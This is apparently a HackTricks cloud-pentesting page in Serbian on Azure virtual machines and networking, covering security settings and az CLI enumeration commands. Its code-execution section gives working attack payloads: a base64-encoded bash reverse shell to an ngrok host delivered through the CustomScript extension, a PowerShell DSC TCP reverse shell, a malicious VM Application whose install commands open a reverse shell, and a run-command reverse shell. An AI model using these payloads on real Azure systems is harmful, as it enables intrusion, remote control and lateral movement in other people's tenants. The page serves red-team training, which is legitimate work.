Az - Virtuelne mašine i mreža

Reading time: 25 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Osnovne informacije o Azure mrežama

Azure mreže sadrže različite entitete i načine za konfiguraciju. Možete pronaći kratak opis, primere i komande za enumeraciju različitih Azure mrežnih entiteta u:

Az - Azure Network

Osnovne informacije o VM-ovima

Azure virtuelne mašine (VM-ovi) su fleksibilni, na zahtev serveri zasnovani na oblaku koji vam omogućavaju da pokrećete Windows ili Linux operativne sisteme. Omogućavaju vam da implementirate aplikacije i radne opterećenja bez upravljanja fizičkim hardverom. Azure VM-ovi se mogu konfigurirati sa različitim opcijama CPU-a, memorije i skladišta kako bi zadovoljili specifične potrebe i integrisali se sa Azure uslugama kao što su virtuelne mreže, skladište i alati za bezbednost.

Konfiguracije bezbednosti

  • Zone dostupnosti: Zone dostupnosti su različite grupe datacentara unutar specifične Azure regije koje su fizički odvojene kako bi se smanjio rizik od uticaja lokalnih prekida ili katastrofa na više zona.
  • Tip bezbednosti:
  • Standardna bezbednost: Ovo je podrazumevani tip bezbednosti koji ne zahteva nikakvu specifičnu konfiguraciju.
  • Pouzdano pokretanje: Ovaj tip bezbednosti poboljšava zaštitu od boot kitova i malvera na nivou jezgra korišćenjem Secure Boot-a i Virtuelnog pouzdanog platformskog modula (vTPM).
  • Poverljive VM-ove: Pored pouzdanog pokretanja, nudi hardversku izolaciju između VM-a, hipervizora i host menadžmenta, poboljšava enkripciju diska i više.
  • Autentifikacija: Podrazumevano se generiše nova SSH ključ, iako je moguće koristiti javni ključ ili prethodni ključ, a podrazumevano korisničko ime je azureuser. Takođe je moguće konfigurirati korišćenje lozinke.
  • Enkripcija diska VM-a: Disk je podrazumevano enkriptovan kada je u mirovanju koristeći ključ koji upravlja platforma.
  • Takođe je moguće omogućiti Enkripciju na hostu, gde će podaci biti enkriptovani na hostu pre slanja u skladišnu uslugu, osiguravajući end-to-end enkripciju između hosta i skladišne usluge (docs).
  • NIC mrežna sigurnosna grupa:
  • Nema: U suštini otvara svaki port
  • Osnovna: Omogućava lako otvaranje ulaznih portova HTTP (80), HTTPS (443), SSH (22), RDP (3389)
  • Napredna: Izaberite sigurnosnu grupu
  • Backup: Moguće je omogućiti Standardni backup (jednom dnevno) i Poboljšani (više puta dnevno)
  • Opcije orkestracije zakrpa: Ovo omogućava automatsko primenjivanje zakrpa na VM-ovima prema odabranoj politici kao što je opisano u docs.
  • Upozorenja: Moguće je automatski dobijati upozorenja putem e-pošte ili mobilne aplikacije kada se nešto dogodi na VM-u. Podrazumevana pravila:
  • Procenat CPU-a je veći od 80%
  • Dostupna memorija u bajtovima je manja od 1GB
  • Procenat potrošnje IOPS podataka na diskovima je veći od 95%
  • Procenat potrošnje IOPS OS-a je veći od 95%
  • Ukupna mreža je veća od 500GB
  • Ukupna mreža izlaz je veća od 200GB
  • VmAvailabilityMetric je manji od 1
  • Monitor zdravlja: Podrazumevano proverava protokol HTTP na portu 80
  • Zaključavanja: Omogućava zaključavanje VM-a tako da može biti samo za čitanje (ReadOnly zaključavanje) ili može biti čitan i ažuriran, ali ne može biti obrisan (CanNotDelete zaključavanje).
  • Većina resursa povezanih sa VM-ovima takođe podržava zaključavanja kao što su diskovi, snimci...
  • Zaključavanja se takođe mogu primeniti na nivoima grupe resursa i pretplate

Diskovi i snimci

  • Moguće je omogućiti povezivanje diska sa 2 ili više VM-ova
  • Podrazumevano je svaki disk enkriptovan sa ključem platforme.
  • Isto važi i za snimke
  • Podrazumevano je moguće deliti disk sa svih mreža, ali se može i ograničiti samo na određene privatne pristupe ili potpuno onemogućiti javni i privatni pristup.
  • Isto važi i za snimke
  • Moguće je generisati SAS URI (maksimalno 60 dana) za izvoz diska, koji se može konfigurisati da zahteva autentifikaciju ili ne
  • Isto važi i za snimke
bash
# List all disks
az disk list --output table

# Get info about a disk
az disk show --name <disk-name> --resource-group <rsc-group>

Slike, Galerijske slike i Tačke vraćanja

VM slika je šablon koji sadrži operativni sistem, podešavanja aplikacija i datotečni sistem potreban za kreiranje nove virtuelne mašine (VM). Razlika između slike i snimka diska je u tome što je snimak diska samo za čitanje, kopija u određenom trenutku jednog upravljanog diska, koja se prvenstveno koristi za backup ili rešavanje problema, dok slika može sadržati više diskova i dizajnirana je da služi kao šablon za kreiranje novih VM-ova.
Slike se mogu upravljati u odeljku Slike u Azure-u ili unutar Azure compute galerija koje omogućavaju generisanje verzija i deljenje slike između različitih korisnika, pa čak i njeno postavljanje kao javne.

Tačka vraćanja čuva konfiguraciju VM-a i snapshots aplikacija u određenom trenutku koji su dosledni za sve upravljane diskove povezane sa VM-om. Povezana je sa VM-om i njen cilj je da omogući vraćanje tog VM-a na stanje u tom specifičnom trenutku.

bash
# Shared Image Galleries | Compute Galleries
## List all galleries and get info about one
az sig list --output table
az sig show --gallery-name <name> --resource-group <rsc-group>

## List all community galleries
az sig list-community --output table

## List galleries shaerd with me
az sig list-shared --location <location> --output table

## List all image definitions in a gallery and get info about one
az sig image-definition list --gallery-name <name> --resource-group <rsc-group> --output table
az sig image-definition show --gallery-image-definition <name> --gallery-name <gallery-name> --resource-group <rsc-group>

## List all the versions of an image definition in a gallery
az sig image-version list --gallery-image-name <image-name> --gallery-name <gallery-name> --resource-group <rsc-group --output table

## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table

# Images
# List all managed images in your subscription
az image list --output table

# Restore points
## List all restore points and get info about 1
az restore-point collection list-all --output table
az restore-point collection show --collection-name <collection-name> --resource-group <rsc-group>

Azure Site Recovery

Iz dokumentacije: Site Recovery pomaže u obezbeđivanju kontinuiteta poslovanja tako što održava poslovne aplikacije i radne opterećenja u radu tokom prekida. Site Recovery replicira radna opterećenja koja se izvode na fizičkim i virtuelnim mašinama (VM) sa primarne lokacije na sekundarnu lokaciju. Kada dođe do prekida na vašoj primarnoj lokaciji, prebacujete se na sekundarnu lokaciju i pristupate aplikacijama odatle. Nakon što primarna lokacija ponovo počne da radi, možete se vratiti na nju.

Azure Bastion

Azure Bastion omogućava siguran i neometan Remote Desktop Protocol (RDP) i Secure Shell (SSH) pristup vašim virtuelnim mašinama (VM) direktno kroz Azure Portal ili putem jump box-a. Tako što uklanja potrebu za javnim IP adresama na vašim VM-ima.

Bastion postavlja podmrežu nazvanu AzureBastionSubnet sa /26 maskom u VNet-u na kojem treba da radi. Zatim omogućava povezivanje sa internim VM-ima putem pregledača koristeći RDP i SSH, izbegavajući izlaganje portova VM-ova internetu. Takođe može raditi kao jump host.

Da biste naveli sve Azure Bastion hostove u vašoj pretplati i povezali se sa VM-ima putem njih, možete koristiti sledeće komande:

bash
# List bastions
az network bastion list -o table

# Connect via SSH through bastion
az network bastion ssh \
--name MyBastion \
--resource-group MyResourceGroup \
--target-resource-id /subscriptions/12345678-1234-1234-1234-123456789abc/resourceGroups/MyResourceGroup/providers/Microsoft.Compute/virtualMachines/MyVM \
--auth-type ssh-key \
--username azureuser \
--ssh-key ~/.ssh/id_rsa

# Connect via RDP through bastion
az network bastion rdp \
--name <BASTION_NAME> \
--resource-group <RESOURCE_GROUP> \
--target-resource-id /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/virtualMachines/<VM_NAME> \
--auth-type password \
--username <VM_USERNAME> \
--password <VM_PASSWORD>

Metadata

Azure Instance Metadata Service (IMDS) pruža informacije o aktivnim instancama virtuelnih mašina kako bi pomogao u njihovom upravljanju i konfiguraciji. Pruža detalje kao što su SKU, skladište, mrežne konfiguracije i informacije o predstojećim događajima održavanja putem REST API dostupnog na ne-rutabilnoj IP adresi 169.254.169.254, koja je dostupna samo iz unutar VM-a. Komunikacija između VM-a i IMDS ostaje unutar hosta, osiguravajući siguran pristup. Kada se upit vrši prema IMDS, HTTP klijenti unutar VM-a treba da zaobiđu web proksije kako bi osigurali pravilnu komunikaciju.

Pored toga, da bi se kontaktirao metadata endpoint, HTTP zahtev mora imati zaglavlje Metadata: true i ne sme imati zaglavlje X-Forwarded-For.

Proverite kako da ga enumerišete u:

Cloud SSRF - HackTricks

VM Enumeration

bash
# VMs
## List all VMs and get info about one
az vm list --output table
az vm show --name <came> --resource-group <rsc-group>

## List all available VM images and get info about one
az vm image list --all --output table

# VM Extensions
## List all VM extensions
az vm extension image list --output table

## Get extensions by publisher
az vm extension image list --publisher "Site24x7" --output table

## List extensions in a VM
az vm extension list -g <rsc-group> --vm-name <vm-name>

## List managed identities in a VM
az vm identity show \
--resource-group <rsc-group> \
--name <vm-name>

# Disks
## List all disks and get info about one
az disk list --output table
az disk show --name <disk-name> --resource-group <rsc-group>

# Snapshots
## List all galleries abd get info about one
az sig list --output table
az sig show --gallery-name <name> --resource-group <rsc-group>

## List all snapshots and get info about one
az snapshot list --output table
az snapshot show --name <name> --resource-group <rsc-group>

# Shared Image Galleries | Compute Galleries
## List all galleries and get info about one
az sig list --output table
az sig show --gallery-name <name> --resource-group <rsc-group>

## List all community galleries
az sig list-community --output table

## List galleries shared with me
az sig list-shared --location <location> --output table

## List all image definitions in a gallery and get info about one
az sig image-definition list --gallery-name <name> --resource-group <rsc-group> --output table
az sig image-definition show --gallery-image-definition <name> --gallery-name <gallery-name> --resource-group <rsc-group>

## List all the versions of an image definition in a gallery
az sig image-version list --gallery-image-name <image-name> --gallery-name <gallery-name> --resource-group <rsc-group --output table

## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table

# Images
# List all managed images in your subscription
az image list --output table

# Restore points
## List all restore points and get info about 1
az restore-point collection list-all --output table
az restore-point collection show --collection-name <collection-name> --resource-group <rsc-group>

# Bastion
## list all bastions
az network bastion list -o table

# Network
## List VNets
az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}"

## List subnets of a VNet
az network vnet subnet list --resource-group <ResourceGroupName> --vnet-name <VNetName> --query "[].{name:name, addressPrefix:addressPrefix}" -o table

## List public IPs
az network public-ip list --output table

## Get NSG rules
az network nsg rule list --nsg-name <NSGName> --resource-group <ResourceGroupName> --query "[].{name:name, priority:priority, direction:direction, access:access, protocol:protocol, sourceAddressPrefix:sourceAddressPrefix, destinationAddressPrefix:destinationAddressPrefix, sourcePortRange:sourcePortRange, destinationPortRange:destinationPortRange}" -o table

## Get NICs and subnets using this NSG
az network nsg show --name MyLowCostVM-nsg --resource-group Resource_Group_1 --query "{subnets: subnets, networkInterfaces: networkInterfaces}"

## List all Nics & get info of a single one
az network nic list --output table
az network nic show --name <name> --resource-group <rsc-group>

## List Azure Firewalls
az network firewall list --query "[].{name:name, location:location, subnet:subnet, publicIp:publicIp}" -o table

## Get network rules of a firewall
az network firewall network-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table

## Get application rules of a firewall
az network firewall application-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table

## Get nat rules of a firewall
az network firewall nat-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table

## List Route Tables
az network route-table list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table

## List routes for a table
az network route-table route list --route-table-name <RouteTableName> --resource-group <ResourceGroupName> --query "[].{name:name, addressPrefix:addressPrefix, nextHopType:nextHopType, nextHopIpAddress:nextHopIpAddress}" -o table

# Misc
## List all virtual machine scale sets
az vmss list --output table

## List all availability sets
az vm availability-set list --output table

## List all load balancers
az network lb list --output table

## List all storage accounts
az storage account list --output table

## List all custom script extensions on a specific VM
az vm extension list --vm-name <vm-name> --resource-group <resource-group>

# Show boot diagnostics settings for a specific VM
az vm boot-diagnostics get-boot-log --name <vm-name> --resource-group <resource-group>

## List all tags on virtual machines
az resource list --resource-type "Microsoft.Compute/virtualMachines" --query "[].{Name:name, Tags:tags}" --output table

# List all available run commands for virtual machines
az vm run-command list --output table

Izvršavanje Koda u VM-ovima

VM Ekstenzije

Azure VM ekstenzije su male aplikacije koje pružaju konfiguraciju nakon implementacije i automatizovane zadatke na Azure virtuelnim mašinama (VM-ovima).

Ovo bi omogućilo izvršavanje proizvoljnog koda unutar VM-ova.

Potrebna dozvola je Microsoft.Compute/virtualMachines/extensions/write.

Moguće je nabrojati sve dostupne ekstenzije sa:

bash
# It takes some mins to run
az vm extension image list --output table

# Get extensions by publisher
az vm extension image list --publisher "Site24x7" --output table

Moguće je pokrenuti prilagođene ekstenzije koje izvršavaju prilagođeni kod:

  • Izvrši reverznu školjku
bash
# Prepare the rev shell
echo -n 'bash -i  >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ==

# Execute rev shell
az vm extension set \
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{}' \
--protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
  • Izvršite skriptu koja se nalazi na internetu
bash
az vm extension set \
--resource-group rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
--protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'

Relevant VM extensions

Zahtevana dozvola je još uvek Microsoft.Compute/virtualMachines/extensions/write.

VMAccess ekstenzija

Ova ekstenzija omogućava modifikaciju lozinke (ili kreiranje ako ne postoji) korisnika unutar Windows VM-ova.

bash
# Run VMAccess extension to reset the password
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
DesiredStateConfiguration (DSC)

Ovo je VM ekstenzija koja pripada Microsoftu i koristi PowerShell DSC za upravljanje konfiguracijom Azure Windows VMs. Stoga se može koristiti za izvršavanje proizvoljnih komandi u Windows VMs putem ove ekstenzije:

bash
# Content of revShell.ps1
Configuration RevShellConfig {
Node localhost {
Script ReverseShell {
GetScript = { @{} }
SetScript = {
$client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length)
}
$client.Close()
}
TestScript = { return $false }
}
}
}
RevShellConfig -OutputPath .\Output

# Upload config to blob
$resourceGroup = 'dscVmDemo'
$storageName = 'demostorage'
Publish-AzVMDscConfiguration `
-ConfigurationPath .\revShell.ps1 `
-ResourceGroupName $resourceGroup `
-StorageAccountName $storageName `
-Force

# Apply DSC to VM and execute rev shell
$vmName = 'myVM'
Set-AzVMDscExtension `
-Version '2.76' `
-ResourceGroupName $resourceGroup `
-VMName $vmName `
-ArchiveStorageAccountName $storageName `
-ArchiveBlobName 'revShell.ps1.zip' `
-AutoUpdate `
-ConfigurationName 'RevShellConfig'
Hybrid Runbook Worker

Ovo je VM ekstenzija koja bi omogućila izvršavanje runbook-ova u VM-ovima iz automatskog naloga. Za više informacija pogledajte Automation Accounts service.

VM Applications

Ovo su paketi sa svim podacima o aplikaciji i skriptama za instalaciju i deinstalaciju koji se mogu koristiti za lako dodavanje i uklanjanje aplikacija u VM-ovima.

bash
# List all galleries in resource group
az sig list --resource-group <res-group> --output table

# List all apps in a fallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table

Ovo su putanje gde se aplikacije preuzimaju unutar fajl sistema:

  • Linux: /var/lib/waagent/Microsoft.CPlat.Core.VMApplicationManagerLinux/<appname>/<app version>
  • Windows: C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.9\Downloads\<appname>\<app version>

Proverite kako da instalirate nove aplikacije u https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli

caution

Moguće je deliti pojedinačne aplikacije i galerije sa drugim pretplatama ili zakupcima. Što je veoma zanimljivo jer bi to moglo omogućiti napadaču da unese backdoor u aplikaciju i pređe na druge pretplate i zakupce.

Ali ne postoji "marketplace" za vm aplikacije kao što postoji za ekstenzije.

Potrebne dozvole su:

  • Microsoft.Compute/galleries/applications/write
  • Microsoft.Compute/galleries/applications/versions/write
  • Microsoft.Compute/virtualMachines/write
  • Microsoft.Network/networkInterfaces/join/action
  • Microsoft.Compute/disks/write

Primer eksploatacije za izvršavanje proizvoljnih komandi:

bash
# Create gallery (if the isn't any)
az sig create --resource-group myResourceGroup \
--gallery-name myGallery --location "West US 2"

# Create application container
az sig gallery-application create \
--application-name myReverseShellApp \
--gallery-name myGallery \
--resource-group <rsc-group> \
--os-type Linux \
--location "West US 2"

# Create app version with the rev shell
## In Package file link just add any link to a blobl storage file
az sig gallery-application version create \
--version-name 1.0.2 \
--application-name myReverseShellApp \
--gallery-name myGallery \
--location "West US 2" \
--resource-group <rsc-group> \
--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
--install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"

# Install the app in a VM to execute the rev shell
## Use the ID given in the previous output
az vm application set \
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true

Korisnički podaci

Ovo su perzistentni podaci koji se mogu preuzeti sa metadata krajnje tačke u bilo kojem trenutku. Napomena: u Azure korisnički podaci se razlikuju od AWS i GCP jer ako ovde postavite skriptu, ona se po defaultu ne izvršava.

Prilagođeni podaci

Moguće je proslediti neke podatke VM-u koji će biti sačuvani na očekivanim putanjama:

  • U Windows prilagođeni podaci se smeštaju u %SYSTEMDRIVE%\AzureData\CustomData.bin kao binarni fajl i ne obrađuju se.
  • U Linux su se čuvali u /var/lib/waagent/ovf-env.xml, a sada se čuvaju u /var/lib/waagent/CustomData/ovf-env.xml
  • Linux agent: Po defaultu ne obrađuje prilagođene podatke, potrebna je prilagođena slika sa omogućеним podacima
  • cloud-init: Po defaultu obrađuje prilagođene podatke i ovi podaci mogu biti u several formats. Može lako izvršiti skriptu jednostavno slanjem samo skripte u prilagođenim podacima.
  • Pokušao sam da i Ubuntu i Debian izvrše skriptu koju ovde stavite.
  • Takođe nije potrebno omogućiti korisničke podatke da bi ovo bilo izvršeno.
bash
#!/bin/sh
echo "Hello World" > /var/tmp/output.txt

Pokreni Komandu

Ovo je najosnovniji mehanizam koji Azure pruža za izvršavanje proizvoljnih komandi u VM-ovima. Potrebna dozvola je Microsoft.Compute/virtualMachines/runCommand/action.

bash
# Execute rev shell
az vm run-command invoke \
--resource-group <rsc-group> \
--name <vm-name> \
--command-id RunShellScript \
--scripts @revshell.sh

# revshell.sh file content
echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh

Eskalacija privilegija

Az - Virtual Machines & Network Privesc

Neautentifikovani pristup

Az - VMs Unauth

Post eksploatacija

Az - VMs & Network Post Exploitation

Postojanost

Az - VMs Persistence

Reference

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks